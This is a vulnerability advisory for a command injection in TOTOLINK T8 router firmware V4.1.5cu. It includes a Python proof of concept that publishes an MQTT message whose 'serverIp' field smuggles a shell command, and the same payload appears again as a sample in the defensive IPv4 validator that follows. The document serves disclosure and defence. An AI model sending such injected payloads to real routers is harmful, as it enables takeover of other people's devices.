A command injection vulnerability in the function meshSlaveUpdate of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet.

Description

A command injection vulnerability in the function meshSlaveUpdate of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet.


Firmware information

[Image: firmware information]

Affected version

Version: V4.1.5cu

Vulnerability details

The T8 router exposes an MQTT service.


In the function meshSlaveUpdate, the "serverIp" parameter is not filtered, so user input passed in it can cause command injection.


POC

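```python
import paho.mqtt.client as mqtt

# Connect to the MQTT service on the router (host, port, keepalive)
client = mqtt.Client()
client.connect("192.168.0.1", 1883, 60)
# Publish to the meshSlaveUpdate topic; the "serverIp" value is the unfiltered input
client.publish("totolink/router/meshSlaveUpdate", b'{"serverIp": ";ls>/tmp/meshSlaveUpdate.txt;"}')
```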

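The filter that is missing on "serverIp", written as an added example that is not part of the original advisory or of the vendor's code: it inspects MQTT publishes on the topic used in the PoC and accepts the field only when it is a literal IPv4 address. The function names, the verdict strings, the sample messages and the premise that "serverIp" should carry an IPv4 address are assumptions of this example.

```python
import ipaddress
import json

# Topic taken from the PoC on this page.
MESH_UPDATE_TOPIC = "totolink/router/meshSlaveUpdate"


def check_server_ip(value):
    """Return (ok, reason); only a literal dotted-quad IPv4 string passes."""
    if not isinstance(value, str):
        return False, "serverIp is not a string"
    try:
        # IPv4Address is used rather than ip_address(): the latter also accepts
        # IPv6 scope IDs ("fe80::1%<text>"), and that text may be arbitrary.
        ipaddress.IPv4Address(value)
    except ValueError:
        return False, "serverIp is not a literal IPv4 address"
    return True, "ok"


def inspect_publish(topic, payload):
    """Classify one MQTT PUBLISH (topic str, payload bytes): ignore/allow/block."""
    if topic != MESH_UPDATE_TOPIC:
        return "ignore", "other topic"
    try:
        msg = json.loads(payload.decode("utf-8"))
    except ValueError:  # covers UnicodeDecodeError and JSONDecodeError
        return "block", "payload is not valid UTF-8 JSON"
    if not isinstance(msg, dict) or "serverIp" not in msg:
        return "block", "missing serverIp"
    ok, reason = check_server_ip(msg["serverIp"])
    return ("allow" if ok else "block"), reason


# Constructed sample messages; the third payload is the one from the PoC above.
SAMPLES = [
    ("totolink/router/other", b"{}"),
    (MESH_UPDATE_TOPIC, b'{"serverIp": "192.168.0.10"}'),
    (MESH_UPDATE_TOPIC, b'{"serverIp": ";ls>/tmp/meshSlaveUpdate.txt;"}'),
    (MESH_UPDATE_TOPIC, b'{"serverIp": 5}'),
    (MESH_UPDATE_TOPIC, b"\xff not json"),
]

if __name__ == "__main__":
    for topic, payload in SAMPLES:
        print(inspect_publish(topic, payload), topic, payload)
```

Validation of this kind belongs at the point where the firmware consumes the value; the same allow-list check can also run as a detection over captured broker traffic.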